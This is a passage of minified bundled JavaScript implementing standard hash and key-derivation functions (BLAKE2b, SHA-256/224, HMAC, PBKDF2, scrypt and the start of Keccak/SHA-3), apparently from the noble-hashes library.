                        this.buffer32 = (0, i.u32)(this.buffer = new Uint8Array(e));
                    }
                    update(e) {
                        n.default.exists(this);
                        const { blockLen: t, buffer: r, buffer32: o } = this, s = (e = (0, i.toBytes)(e)).length;
                        for(let n = 0; n < s;){
                            this.pos === t && (this.compress(o, 0, !1), this.pos = 0);
                            const i = Math.min(t - this.pos, s - n), a = e.byteOffset + n;
                            if (i !== t || a % 4 || !(n + i < s)) r.set(e.subarray(n, n + i), this.pos), this.pos += i, this.length += i, n += i;
                            else {
                                const r = new Uint32Array(e.buffer, a, Math.floor((s - n) / 4));
                                for(let e = 0; n + t < s; e += o.length, n += t)this.length += t, this.compress(r, e, !1);
                            }
                        }
                        return this;
                    }
                    digestInto(e) {
                        n.default.exists(this), n.default.output(e, this);
                        const { pos: t, buffer32: r } = this;
                        this.finished = !0, this.buffer.subarray(t).fill(0), this.compress(r, 0, !0);
                        const o = (0, i.u32)(e);
                        this.get().forEach((e, t)=>o[t] = e);
                    }
                    digest() {
                        const { buffer: e, outputLen: t } = this;
                        this.digestInto(e);
                        const r = e.slice(0, t);
                        return this.destroy(), r;
                    }
                    _cloneInto(e) {
                        const { buffer: t, length: r, finished: n, destroyed: i, outputLen: o, pos: s } = this;
                        return e || (e = new this.constructor({
                            dkLen: o
                        })), e.set(...this.get()), e.length = r, e.finished = n, e.destroyed = i, e.outputLen = o, e.buffer.set(t), e.pos = s, e;
                    }
                }
                t.BLAKE2 = o;
            },
            9350: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SHA2 = void 0;
                const n = r(3525), i = r(64);
                class o extends i.Hash {
                    constructor(e, t, r, n){
                        super(), this.blockLen = e, this.outputLen = t, this.padOffset = r, this.isLE = n, this.finished = !1, this.length = 0, this.pos = 0, this.destroyed = !1, this.buffer = new Uint8Array(e), this.view = (0, i.createView)(this.buffer);
                    }
                    update(e) {
                        n.default.exists(this);
                        const { view: t, buffer: r, blockLen: o } = this, s = (e = (0, i.toBytes)(e)).length;
                        for(let n = 0; n < s;){
                            const a = Math.min(o - this.pos, s - n);
                            if (a !== o) r.set(e.subarray(n, n + a), this.pos), this.pos += a, n += a, this.pos === o && (this.process(t, 0), this.pos = 0);
                            else {
                                const t = (0, i.createView)(e);
                                for(; o <= s - n; n += o)this.process(t, n);
                            }
                        }
                        return this.length += e.length, this.roundClean(), this;
                    }
                    digestInto(e) {
                        n.default.exists(this), n.default.output(e, this), this.finished = !0;
                        const { buffer: t, view: r, blockLen: o, isLE: s } = this;
                        let { pos: a } = this;
                        t[a++] = 128, this.buffer.subarray(a).fill(0), this.padOffset > o - a && (this.process(r, 0), a = 0);
                        for(let e = a; e < o; e++)t[e] = 0;
                        !function(e, t, r, n) {
                            if ("function" == typeof e.setBigUint64) return e.setBigUint64(t, r, n);
                            const i = BigInt(32), o = BigInt(4294967295), s = Number(r >> i & o), a = Number(r & o), u = n ? 4 : 0, c = n ? 0 : 4;
                            e.setUint32(t + u, s, n), e.setUint32(t + c, a, n);
                        }(r, o - 8, BigInt(8 * this.length), s), this.process(r, 0);
                        const u = (0, i.createView)(e), c = this.outputLen;
                        if (c % 4) throw new Error("_sha2: outputLen should be aligned to 32bit");
                        const l = c / 4, d = this.get();
                        if (l > d.length) throw new Error("_sha2: outputLen bigger than state");
                        for(let e = 0; e < l; e++)u.setUint32(4 * e, d[e], s);
                    }
                    digest() {
                        const { buffer: e, outputLen: t } = this;
                        this.digestInto(e);
                        const r = e.slice(0, t);
                        return this.destroy(), r;
                    }
                    _cloneInto(e) {
                        e || (e = new this.constructor), e.set(...this.get());
                        const { blockLen: t, buffer: r, length: n, finished: i, destroyed: o, pos: s } = this;
                        return e.length = n, e.pos = s, e.finished = i, e.destroyed = o, n % t && e.buffer.set(r), e;
                    }
                }
                t.SHA2 = o;
            },
            1655: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.add = t.toBig = t.split = t.fromBig = void 0;
                const r = BigInt(2 ** 32 - 1), n = BigInt(32);
                function i(e, t = !1) {
                    return t ? {
                        h: Number(e & r),
                        l: Number(e >> n & r)
                    } : {
                        h: 0 | Number(e >> n & r),
                        l: 0 | Number(e & r)
                    };
                }
                function o(e, t = !1) {
                    let r = new Uint32Array(e.length), n = new Uint32Array(e.length);
                    for(let o = 0; o < e.length; o++){
                        const { h: s, l: a } = i(e[o], t);
                        [r[o], n[o]] = [
                            s,
                            a
                        ];
                    }
                    return [
                        r,
                        n
                    ];
                }
                function s(e, t, r, n) {
                    const i = (t >>> 0) + (n >>> 0);
                    return {
                        h: e + r + (i / 2 ** 32 | 0) | 0,
                        l: 0 | i
                    };
                }
                t.fromBig = i, t.split = o, t.toBig = (e, t)=>BigInt(e >>> 0) << n | BigInt(t >>> 0), t.add = s;
                const a = {
                    fromBig: i,
                    split: o,
                    toBig: t.toBig,
                    shrSH: (e, t, r)=>e >>> r,
                    shrSL: (e, t, r)=>e << 32 - r | t >>> r,
                    rotrSH: (e, t, r)=>e >>> r | t << 32 - r,
                    rotrSL: (e, t, r)=>e << 32 - r | t >>> r,
                    rotrBH: (e, t, r)=>e << 64 - r | t >>> r - 32,
                    rotrBL: (e, t, r)=>e >>> r - 32 | t << 64 - r,
                    rotr32H: (e, t)=>t,
                    rotr32L: (e, t)=>e,
                    rotlSH: (e, t, r)=>e << r | t >>> 32 - r,
                    rotlSL: (e, t, r)=>t << r | e >>> 32 - r,
                    rotlBH: (e, t, r)=>t << r - 32 | e >>> 64 - r,
                    rotlBL: (e, t, r)=>e << r - 32 | t >>> 64 - r,
                    add: s,
                    add3L: (e, t, r)=>(e >>> 0) + (t >>> 0) + (r >>> 0),
                    add3H: (e, t, r, n)=>t + r + n + (e / 2 ** 32 | 0) | 0,
                    add4L: (e, t, r, n)=>(e >>> 0) + (t >>> 0) + (r >>> 0) + (n >>> 0),
                    add4H: (e, t, r, n, i)=>t + r + n + i + (e / 2 ** 32 | 0) | 0,
                    add5H: (e, t, r, n, i, o)=>t + r + n + i + o + (e / 2 ** 32 | 0) | 0,
                    add5L: (e, t, r, n, i)=>(e >>> 0) + (t >>> 0) + (r >>> 0) + (n >>> 0) + (i >>> 0)
                };
                t.default = a;
            },
            3806: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.blake2b = void 0;
                const n = r(2686), i = r(1655), o = r(64), s = new Uint32Array([
                    4089235720,
                    1779033703,
                    2227873595,
                    3144134277,
                    4271175723,
                    1013904242,
                    1595750129,
                    2773480762,
                    2917565137,
                    1359893119,
                    725511199,
                    2600822924,
                    4215389547,
                    528734635,
                    327033209,
                    1541459225
                ]), a = new Uint32Array(32);
                function u(e, t, r, n, o, s) {
                    const u = o[s], c = o[s + 1];
                    let l = a[2 * e], d = a[2 * e + 1], h = a[2 * t], f = a[2 * t + 1], p = a[2 * r], m = a[2 * r + 1], g = a[2 * n], y = a[2 * n + 1], v = i.default.add3L(l, h, u);
                    d = i.default.add3H(v, d, f, c), l = 0 | v, ({ Dh: y, Dl: g } = {
                        Dh: y ^ d,
                        Dl: g ^ l
                    }), ({ Dh: y, Dl: g } = {
                        Dh: i.default.rotr32H(y, g),
                        Dl: i.default.rotr32L(y, g)
                    }), ({ h: m, l: p } = i.default.add(m, p, y, g)), ({ Bh: f, Bl: h } = {
                        Bh: f ^ m,
                        Bl: h ^ p
                    }), ({ Bh: f, Bl: h } = {
                        Bh: i.default.rotrSH(f, h, 24),
                        Bl: i.default.rotrSL(f, h, 24)
                    }), a[2 * e] = l, a[2 * e + 1] = d, a[2 * t] = h, a[2 * t + 1] = f, a[2 * r] = p, a[2 * r + 1] = m, a[2 * n] = g, a[2 * n + 1] = y;
                }
                function c(e, t, r, n, o, s) {
                    const u = o[s], c = o[s + 1];
                    let l = a[2 * e], d = a[2 * e + 1], h = a[2 * t], f = a[2 * t + 1], p = a[2 * r], m = a[2 * r + 1], g = a[2 * n], y = a[2 * n + 1], v = i.default.add3L(l, h, u);
                    d = i.default.add3H(v, d, f, c), l = 0 | v, ({ Dh: y, Dl: g } = {
                        Dh: y ^ d,
                        Dl: g ^ l
                    }), ({ Dh: y, Dl: g } = {
                        Dh: i.default.rotrSH(y, g, 16),
                        Dl: i.default.rotrSL(y, g, 16)
                    }), ({ h: m, l: p } = i.default.add(m, p, y, g)), ({ Bh: f, Bl: h } = {
                        Bh: f ^ m,
                        Bl: h ^ p
                    }), ({ Bh: f, Bl: h } = {
                        Bh: i.default.rotrBH(f, h, 63),
                        Bl: i.default.rotrBL(f, h, 63)
                    }), a[2 * e] = l, a[2 * e + 1] = d, a[2 * t] = h, a[2 * t + 1] = f, a[2 * r] = p, a[2 * r + 1] = m, a[2 * n] = g, a[2 * n + 1] = y;
                }
                class l extends n.BLAKE2 {
                    constructor(e = {}){
                        super(128, void 0 === e.dkLen ? 64 : e.dkLen, e, 64, 16, 16), this.v0l = 0 | s[0], this.v0h = 0 | s[1], this.v1l = 0 | s[2], this.v1h = 0 | s[3], this.v2l = 0 | s[4], this.v2h = 0 | s[5], this.v3l = 0 | s[6], this.v3h = 0 | s[7], this.v4l = 0 | s[8], this.v4h = 0 | s[9], this.v5l = 0 | s[10], this.v5h = 0 | s[11], this.v6l = 0 | s[12], this.v6h = 0 | s[13], this.v7l = 0 | s[14], this.v7h = 0 | s[15];
                        const t = e.key ? e.key.length : 0;
                        if (this.v0l ^= this.outputLen | t << 8 | 16842752, e.salt) {
                            const t = (0, o.u32)((0, o.toBytes)(e.salt));
                            this.v4l ^= t[0], this.v4h ^= t[1], this.v5l ^= t[2], this.v5h ^= t[3];
                        }
                        if (e.personalization) {
                            const t = (0, o.u32)((0, o.toBytes)(e.personalization));
                            this.v6l ^= t[0], this.v6h ^= t[1], this.v7l ^= t[2], this.v7h ^= t[3];
                        }
                        if (e.key) {
                            const t = new Uint8Array(this.blockLen);
                            t.set((0, o.toBytes)(e.key)), this.update(t);
                        }
                    }
                    get() {
                        let { v0l: e, v0h: t, v1l: r, v1h: n, v2l: i, v2h: o, v3l: s, v3h: a, v4l: u, v4h: c, v5l: l, v5h: d, v6l: h, v6h: f, v7l: p, v7h: m } = this;
                        return [
                            e,
                            t,
                            r,
                            n,
                            i,
                            o,
                            s,
                            a,
                            u,
                            c,
                            l,
                            d,
                            h,
                            f,
                            p,
                            m
                        ];
                    }
                    set(e, t, r, n, i, o, s, a, u, c, l, d, h, f, p, m) {
                        this.v0l = 0 | e, this.v0h = 0 | t, this.v1l = 0 | r, this.v1h = 0 | n, this.v2l = 0 | i, this.v2h = 0 | o, this.v3l = 0 | s, this.v3h = 0 | a, this.v4l = 0 | u, this.v4h = 0 | c, this.v5l = 0 | l, this.v5h = 0 | d, this.v6l = 0 | h, this.v6h = 0 | f, this.v7l = 0 | p, this.v7h = 0 | m;
                    }
                    compress(e, t, r) {
                        this.get().forEach((e, t)=>a[t] = e), a.set(s, 16);
                        let { h: o, l: l } = i.default.fromBig(BigInt(this.length));
                        a[24] = s[8] ^ l, a[25] = s[9] ^ o, r && (a[28] = ~a[28], a[29] = ~a[29]);
                        let d = 0;
                        const h = n.SIGMA;
                        for(let r = 0; r < 12; r++)u(0, 4, 8, 12, e, t + 2 * h[d++]), c(0, 4, 8, 12, e, t + 2 * h[d++]), u(1, 5, 9, 13, e, t + 2 * h[d++]), c(1, 5, 9, 13, e, t + 2 * h[d++]), u(2, 6, 10, 14, e, t + 2 * h[d++]), c(2, 6, 10, 14, e, t + 2 * h[d++]), u(3, 7, 11, 15, e, t + 2 * h[d++]), c(3, 7, 11, 15, e, t + 2 * h[d++]), u(0, 5, 10, 15, e, t + 2 * h[d++]), c(0, 5, 10, 15, e, t + 2 * h[d++]), u(1, 6, 11, 12, e, t + 2 * h[d++]), c(1, 6, 11, 12, e, t + 2 * h[d++]), u(2, 7, 8, 13, e, t + 2 * h[d++]), c(2, 7, 8, 13, e, t + 2 * h[d++]), u(3, 4, 9, 14, e, t + 2 * h[d++]), c(3, 4, 9, 14, e, t + 2 * h[d++]);
                        this.v0l ^= a[0] ^ a[16], this.v0h ^= a[1] ^ a[17], this.v1l ^= a[2] ^ a[18], this.v1h ^= a[3] ^ a[19], this.v2l ^= a[4] ^ a[20], this.v2h ^= a[5] ^ a[21], this.v3l ^= a[6] ^ a[22], this.v3h ^= a[7] ^ a[23], this.v4l ^= a[8] ^ a[24], this.v4h ^= a[9] ^ a[25], this.v5l ^= a[10] ^ a[26], this.v5h ^= a[11] ^ a[27], this.v6l ^= a[12] ^ a[28], this.v6h ^= a[13] ^ a[29], this.v7l ^= a[14] ^ a[30], this.v7h ^= a[15] ^ a[31], a.fill(0);
                    }
                    destroy() {
                        this.destroyed = !0, this.buffer32.fill(0), this.set(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0);
                    }
                }
                t.blake2b = (0, o.wrapConstructorWithOpts)((e)=>new l(e));
            },
            825: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.crypto = void 0, t.crypto = "object" == typeof globalThis && "crypto" in globalThis ? globalThis.crypto : void 0;
            },
            1377: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hmac = void 0;
                const n = r(3525), i = r(64);
                class o extends i.Hash {
                    constructor(e, t){
                        super(), this.finished = !1, this.destroyed = !1, n.default.hash(e);
                        const r = (0, i.toBytes)(t);
                        if (this.iHash = e.create(), "function" != typeof this.iHash.update) throw new TypeError("Expected instance of class which extends utils.Hash");
                        this.blockLen = this.iHash.blockLen, this.outputLen = this.iHash.outputLen;
                        const o = this.blockLen, s = new Uint8Array(o);
                        s.set(r.length > o ? e.create().update(r).digest() : r);
                        for(let e = 0; e < s.length; e++)s[e] ^= 54;
                        this.iHash.update(s), this.oHash = e.create();
                        for(let e = 0; e < s.length; e++)s[e] ^= 106;
                        this.oHash.update(s), s.fill(0);
                    }
                    update(e) {
                        return n.default.exists(this), this.iHash.update(e), this;
                    }
                    digestInto(e) {
                        n.default.exists(this), n.default.bytes(e, this.outputLen), this.finished = !0, this.iHash.digestInto(e), this.oHash.update(e), this.oHash.digestInto(e), this.destroy();
                    }
                    digest() {
                        const e = new Uint8Array(this.oHash.outputLen);
                        return this.digestInto(e), e;
                    }
                    _cloneInto(e) {
                        e || (e = Object.create(Object.getPrototypeOf(this), {}));
                        const { oHash: t, iHash: r, finished: n, destroyed: i, blockLen: o, outputLen: s } = this;
                        return e.finished = n, e.destroyed = i, e.blockLen = o, e.outputLen = s, e.oHash = t._cloneInto(e.oHash), e.iHash = r._cloneInto(e.iHash), e;
                    }
                    destroy() {
                        this.destroyed = !0, this.oHash.destroy(), this.iHash.destroy();
                    }
                }
                t.hmac = (e, t, r)=>new o(e, t).update(r).digest(), t.hmac.create = (e, t)=>new o(e, t);
            },
            9179: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.pbkdf2Async = t.pbkdf2 = void 0;
                const n = r(3525), i = r(1377), o = r(64);
                function s(e, t, r, s) {
                    n.default.hash(e);
                    const a = (0, o.checkOpts)({
                        dkLen: 32,
                        asyncTick: 10
                    }, s), { c: u, dkLen: c, asyncTick: l } = a;
                    if (n.default.number(u), n.default.number(c), n.default.number(l), u < 1) throw new Error("PBKDF2: iterations (c) should be >= 1");
                    const d = (0, o.toBytes)(t), h = (0, o.toBytes)(r), f = new Uint8Array(c), p = i.hmac.create(e, d), m = p._cloneInto().update(h);
                    return {
                        c: u,
                        dkLen: c,
                        asyncTick: l,
                        DK: f,
                        PRF: p,
                        PRFSalt: m
                    };
                }
                function a(e, t, r, n, i) {
                    return e.destroy(), t.destroy(), n && n.destroy(), i.fill(0), r;
                }
                t.pbkdf2 = function(e, t, r, n) {
                    const { c: i, dkLen: u, DK: c, PRF: l, PRFSalt: d } = s(e, t, r, n);
                    let h;
                    const f = new Uint8Array(4), p = (0, o.createView)(f), m = new Uint8Array(l.outputLen);
                    for(let e = 1, t = 0; t < u; e++, t += l.outputLen){
                        const r = c.subarray(t, t + l.outputLen);
                        p.setInt32(0, e, !1), (h = d._cloneInto(h)).update(f).digestInto(m), r.set(m.subarray(0, r.length));
                        for(let e = 1; e < i; e++){
                            l._cloneInto(h).update(m).digestInto(m);
                            for(let e = 0; e < r.length; e++)r[e] ^= m[e];
                        }
                    }
                    return a(l, d, c, h, m);
                }, t.pbkdf2Async = async function(e, t, r, n) {
                    const { c: i, dkLen: u, asyncTick: c, DK: l, PRF: d, PRFSalt: h } = s(e, t, r, n);
                    let f;
                    const p = new Uint8Array(4), m = (0, o.createView)(p), g = new Uint8Array(d.outputLen);
                    for(let e = 1, t = 0; t < u; e++, t += d.outputLen){
                        const r = l.subarray(t, t + d.outputLen);
                        m.setInt32(0, e, !1), (f = h._cloneInto(f)).update(p).digestInto(g), r.set(g.subarray(0, r.length)), await (0, o.asyncLoop)(i - 1, c, (e)=>{
                            d._cloneInto(f).update(g).digestInto(g);
                            for(let e = 0; e < r.length; e++)r[e] ^= g[e];
                        });
                    }
                    return a(d, h, l, f, g);
                };
            },
            2739: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.scryptAsync = t.scrypt = void 0;
                const n = r(3525), i = r(6053), o = r(9179), s = r(64), a = (e, t)=>e << t | e >>> 32 - t;
                function u(e, t, r, n, i, o) {
                    let s = e[t++] ^ r[n++], u = e[t++] ^ r[n++], c = e[t++] ^ r[n++], l = e[t++] ^ r[n++], d = e[t++] ^ r[n++], h = e[t++] ^ r[n++], f = e[t++] ^ r[n++], p = e[t++] ^ r[n++], m = e[t++] ^ r[n++], g = e[t++] ^ r[n++], y = e[t++] ^ r[n++], v = e[t++] ^ r[n++], b = e[t++] ^ r[n++], E = e[t++] ^ r[n++], A = e[t++] ^ r[n++], _ = e[t++] ^ r[n++], w = s, T = u, R = c, I = l, S = d, P = h, O = f, x = p, M = m, B = g, N = y, C = v, k = b, L = E, F = A, D = _;
                    for(let e = 0; e < 8; e += 2)S ^= a(w + k | 0, 7), M ^= a(S + w | 0, 9), k ^= a(M + S | 0, 13), w ^= a(k + M | 0, 18), B ^= a(P + T | 0, 7), L ^= a(B + P | 0, 9), T ^= a(L + B | 0, 13), P ^= a(T + L | 0, 18), F ^= a(N + O | 0, 7), R ^= a(F + N | 0, 9), O ^= a(R + F | 0, 13), N ^= a(O + R | 0, 18), I ^= a(D + C | 0, 7), x ^= a(I + D | 0, 9), C ^= a(x + I | 0, 13), D ^= a(C + x | 0, 18), T ^= a(w + I | 0, 7), R ^= a(T + w | 0, 9), I ^= a(R + T | 0, 13), w ^= a(I + R | 0, 18), O ^= a(P + S | 0, 7), x ^= a(O + P | 0, 9), S ^= a(x + O | 0, 13), P ^= a(S + x | 0, 18), C ^= a(N + B | 0, 7), M ^= a(C + N | 0, 9), B ^= a(M + C | 0, 13), N ^= a(B + M | 0, 18), k ^= a(D + F | 0, 7), L ^= a(k + D | 0, 9), F ^= a(L + k | 0, 13), D ^= a(F + L | 0, 18);
                    i[o++] = s + w | 0, i[o++] = u + T | 0, i[o++] = c + R | 0, i[o++] = l + I | 0, i[o++] = d + S | 0, i[o++] = h + P | 0, i[o++] = f + O | 0, i[o++] = p + x | 0, i[o++] = m + M | 0, i[o++] = g + B | 0, i[o++] = y + N | 0, i[o++] = v + C | 0, i[o++] = b + k | 0, i[o++] = E + L | 0, i[o++] = A + F | 0, i[o++] = _ + D | 0;
                }
                function c(e, t, r, n, i) {
                    let o = n + 0, s = n + 16 * i;
                    for(let n = 0; n < 16; n++)r[s + n] = e[t + 16 * (2 * i - 1) + n];
                    for(let n = 0; n < i; n++, o += 16, t += 16)u(r, s, e, t, r, o), n > 0 && (s += 16), u(r, o, e, t += 16, r, s);
                }
                function l(e, t, r) {
                    const a = (0, s.checkOpts)({
                        dkLen: 32,
                        asyncTick: 10,
                        maxmem: 1073742848
                    }, r), { N: u, r: c, p: l, dkLen: d, asyncTick: h, maxmem: f, onProgress: p } = a;
                    if (n.default.number(u), n.default.number(c), n.default.number(l), n.default.number(d), n.default.number(h), n.default.number(f), void 0 !== p && "function" != typeof p) throw new Error("progressCb should be function");
                    const m = 128 * c, g = m / 4;
                    if (u <= 1 || 0 != (u & u - 1) || u >= 2 ** (m / 8) || u > 2 ** 32) throw new Error("Scrypt: N must be larger than 1, a power of 2, less than 2^(128 * r / 8) and less than 2^32");
                    if (l < 0 || l > 137438953440 / m) throw new Error("Scrypt: p must be a positive integer less than or equal to ((2^32 - 1) * 32) / (128 * r)");
                    if (d < 0 || d > 137438953440) throw new Error("Scrypt: dkLen should be positive integer less than or equal to (2^32 - 1) * 32");
                    const y = m * (u + l);
                    if (y > f) throw new Error(`Scrypt: parameters too large, ${y} (128 * r * (N + p)) > ${f} (maxmem)`);
                    const v = (0, o.pbkdf2)(i.sha256, e, t, {
                        c: 1,
                        dkLen: m * l
                    }), b = (0, s.u32)(v), E = (0, s.u32)(new Uint8Array(m * u)), A = (0, s.u32)(new Uint8Array(m));
                    let _ = ()=>{};
                    if (p) {
                        const e = 2 * u * l, t = Math.max(Math.floor(e / 1e4), 1);
                        let r = 0;
                        _ = ()=>{
                            r++, !p || r % t && r !== e || p(r / e);
                        };
                    }
                    return {
                        N: u,
                        r: c,
                        p: l,
                        dkLen: d,
                        blockSize32: g,
                        V: E,
                        B32: b,
                        B: v,
                        tmp: A,
                        blockMixCb: _,
                        asyncTick: h
                    };
                }
                function d(e, t, r, n, s) {
                    const a = (0, o.pbkdf2)(i.sha256, e, r, {
                        c: 1,
                        dkLen: t
                    });
                    return r.fill(0), n.fill(0), s.fill(0), a;
                }
                t.scrypt = function(e, t, r) {
                    const { N: n, r: i, p: o, dkLen: s, blockSize32: a, V: u, B32: h, B: f, tmp: p, blockMixCb: m } = l(e, t, r);
                    for(let e = 0; e < o; e++){
                        const t = a * e;
                        for(let e = 0; e < a; e++)u[e] = h[t + e];
                        for(let e = 0, t = 0; e < n - 1; e++)c(u, t, u, t += a, i), m();
                        c(u, (n - 1) * a, h, t, i), m();
                        for(let e = 0; e < n; e++){
                            const e = h[t + a - 16] % n;
                            for(let r = 0; r < a; r++)p[r] = h[t + r] ^ u[e * a + r];
                            c(p, 0, h, t, i), m();
                        }
                    }
                    return d(e, s, f, u, p);
                }, t.scryptAsync = async function(e, t, r) {
                    const { N: n, r: i, p: o, dkLen: a, blockSize32: u, V: h, B32: f, B: p, tmp: m, blockMixCb: g, asyncTick: y } = l(e, t, r);
                    for(let e = 0; e < o; e++){
                        const t = u * e;
                        for(let e = 0; e < u; e++)h[e] = f[t + e];
                        let r = 0;
                        await (0, s.asyncLoop)(n - 1, y, (e)=>{
                            c(h, r, h, r += u, i), g();
                        }), c(h, (n - 1) * u, f, t, i), g(), await (0, s.asyncLoop)(n, y, (e)=>{
                            const r = f[t + u - 16] % n;
                            for(let e = 0; e < u; e++)m[e] = f[t + e] ^ h[r * u + e];
                            c(m, 0, f, t, i), g();
                        });
                    }
                    return d(e, a, p, h, m);
                };
            },
            6053: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.sha224 = t.sha256 = void 0;
                const n = r(9350), i = r(64), o = (e, t, r)=>e & t ^ e & r ^ t & r, s = new Uint32Array([
                    1116352408,
                    1899447441,
                    3049323471,
                    3921009573,
                    961987163,
                    1508970993,
                    2453635748,
                    2870763221,
                    3624381080,
                    310598401,
                    607225278,
                    1426881987,
                    1925078388,
                    2162078206,
                    2614888103,
                    3248222580,
                    3835390401,
                    4022224774,
                    264347078,
                    604807628,
                    770255983,
                    1249150122,
                    1555081692,
                    1996064986,
                    2554220882,
                    2821834349,
                    2952996808,
                    3210313671,
                    3336571891,
                    3584528711,
                    113926993,
                    338241895,
                    666307205,
                    773529912,
                    1294757372,
                    1396182291,
                    1695183700,
                    1986661051,
                    2177026350,
                    2456956037,
                    2730485921,
                    2820302411,
                    3259730800,
                    3345764771,
                    3516065817,
                    3600352804,
                    4094571909,
                    275423344,
                    430227734,
                    506948616,
                    659060556,
                    883997877,
                    958139571,
                    1322822218,
                    1537002063,
                    1747873779,
                    1955562222,
                    2024104815,
                    2227730452,
                    2361852424,
                    2428436474,
                    2756734187,
                    3204031479,
                    3329325298
                ]), a = new Uint32Array([
                    1779033703,
                    3144134277,
                    1013904242,
                    2773480762,
                    1359893119,
                    2600822924,
                    528734635,
                    1541459225
                ]), u = new Uint32Array(64);
                class c extends n.SHA2 {
                    constructor(){
                        super(64, 32, 8, !1), this.A = 0 | a[0], this.B = 0 | a[1], this.C = 0 | a[2], this.D = 0 | a[3], this.E = 0 | a[4], this.F = 0 | a[5], this.G = 0 | a[6], this.H = 0 | a[7];
                    }
                    get() {
                        const { A: e, B: t, C: r, D: n, E: i, F: o, G: s, H: a } = this;
                        return [
                            e,
                            t,
                            r,
                            n,
                            i,
                            o,
                            s,
                            a
                        ];
                    }
                    set(e, t, r, n, i, o, s, a) {
                        this.A = 0 | e, this.B = 0 | t, this.C = 0 | r, this.D = 0 | n, this.E = 0 | i, this.F = 0 | o, this.G = 0 | s, this.H = 0 | a;
                    }
                    process(e, t) {
                        for(let r = 0; r < 16; r++, t += 4)u[r] = e.getUint32(t, !1);
                        for(let e = 16; e < 64; e++){
                            const t = u[e - 15], r = u[e - 2], n = (0, i.rotr)(t, 7) ^ (0, i.rotr)(t, 18) ^ t >>> 3, o = (0, i.rotr)(r, 17) ^ (0, i.rotr)(r, 19) ^ r >>> 10;
                            u[e] = o + u[e - 7] + n + u[e - 16] | 0;
                        }
                        let { A: r, B: n, C: a, D: c, E: l, F: d, G: h, H: f } = this;
                        for(let e = 0; e < 64; e++){
                            const t = f + ((0, i.rotr)(l, 6) ^ (0, i.rotr)(l, 11) ^ (0, i.rotr)(l, 25)) + ((p = l) & d ^ ~p & h) + s[e] + u[e] | 0, m = ((0, i.rotr)(r, 2) ^ (0, i.rotr)(r, 13) ^ (0, i.rotr)(r, 22)) + o(r, n, a) | 0;
                            f = h, h = d, d = l, l = c + t | 0, c = a, a = n, n = r, r = t + m | 0;
                        }
                        var p;
                        r = r + this.A | 0, n = n + this.B | 0, a = a + this.C | 0, c = c + this.D | 0, l = l + this.E | 0, d = d + this.F | 0, h = h + this.G | 0, f = f + this.H | 0, this.set(r, n, a, c, l, d, h, f);
                    }
                    roundClean() {
                        u.fill(0);
                    }
                    destroy() {
                        this.set(0, 0, 0, 0, 0, 0, 0, 0), this.buffer.fill(0);
                    }
                }
                class l extends c {
                    constructor(){
                        super(), this.A = -1056596264, this.B = 914150663, this.C = 812702999, this.D = -150054599, this.E = -4191439, this.F = 1750603025, this.G = 1694076839, this.H = -1090891868, this.outputLen = 28;
                    }
                }
                t.sha256 = (0, i.wrapConstructor)(()=>new c), t.sha224 = (0, i.wrapConstructor)(()=>new l);
            },
            125: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.shake256 = t.shake128 = t.keccak_512 = t.keccak_384 = t.keccak_256 = t.keccak_224 = t.sha3_512 = t.sha3_384 = t.sha3_256 = t.sha3_224 = t.Keccak = t.keccakP = void 0;
                const n = r(3525), i = r(1655), o = r(64), [s, a, u] = [
                    [],
                    [],
                    []
                ], c = BigInt(0), l = BigInt(1), d = BigInt(2), h = BigInt(7), f = BigInt(256), p = BigInt(113);
                for(let e = 0, t = l, r = 1, n = 0; e < 24; e++){
                    [r, n] = [
                        n,
                        (2 * r + 3 * n) % 5
                    ], s.push(2 * (5 * n + r)), a.push((e + 1) * (e + 2) / 2 % 64);
                    let i = c;
                    for(let e = 0; e < 7; e++)t = (t << l ^ (t >> h) * p) % f, t & d && (i ^= l << (l << BigInt(e)) - l);
                    u.push(i);
                }
                const [m, g] = i.default.split(u, !0), y = (e, t, r)=>r > 32 ? i.default.rotlBH(e, t, r) : i.default.rotlSH(e, t, r), v = (e, t, r)=>r > 32 ? i.default.rotlBL(e, t, r) : i.default.rotlSL(e, t, r);
                function b(e, t = 24) {
                    const r = new Uint32Array(10);
                    for(let n = 24 - t; n < 24; n++){
                        for(let t = 0; t < 10; t++)r[t] = e[t] ^ e[t + 10] ^ e[t + 20] ^ e[t + 30] ^ e[t + 40];
                        for(let t = 0; t < 10; t += 2){
                            const n = (t + 8) % 10, i = (t + 2) % 10, o = r[i], s = r[i + 1], a = y(o, s, 1) ^ r[n], u = v(o, s, 1) ^ r[n + 1];
                            for(let r = 0; r < 50; r += 10)e[t + r] ^= a, e[t + r + 1] ^= u;
                        }
                        let t = e[2], i = e[3];
                        for(let r = 0; r < 24; r++){
                            const n = a[r], o = y(t, i, n), u = v(t, i, n), c = s[r];
                            t = e[c], i = e[c + 1], e[c] = o, e[c + 1] = u;
                        }
                        for(let t = 0; t < 50; t += 10){
                            for(let n = 0; n < 10; n++)r[n] = e[t + n];
                            for(let n = 0; n < 10; n++)e[t + n] ^= ~r[(n + 2) % 10] & r[(n + 4) % 10];
                        }
                        e[0] ^= m[n], e[1] ^= g[n];
                    }
                    r.fill(0);
                }
                t.keccakP = b;
                class E extends o.Hash {
                    constructor(e, t, r, i = !1, s = 24){
                        if (super(), this.blockLen = e, this.suffix = t, this.outputLen = r, this.enableXOF = i, this.rounds = s, this.pos = 0, this.posOut = 0, this.finished = !1, this.destroyed = !1, n.default.number(r), 0 >= this.blockLen || this.blockLen >= 200) throw new Error("Sha3 supports only keccak-f1600 function");
                        this.state = new Uint8Array(200), this.state32 = (0, o.u32)(this.state);
                    }
                    keccak() {
                        b(this.state32, this.rounds), this.posOut = 0, this.pos = 0;
                    }
                    update(e) {
                        n.default.exists(this);
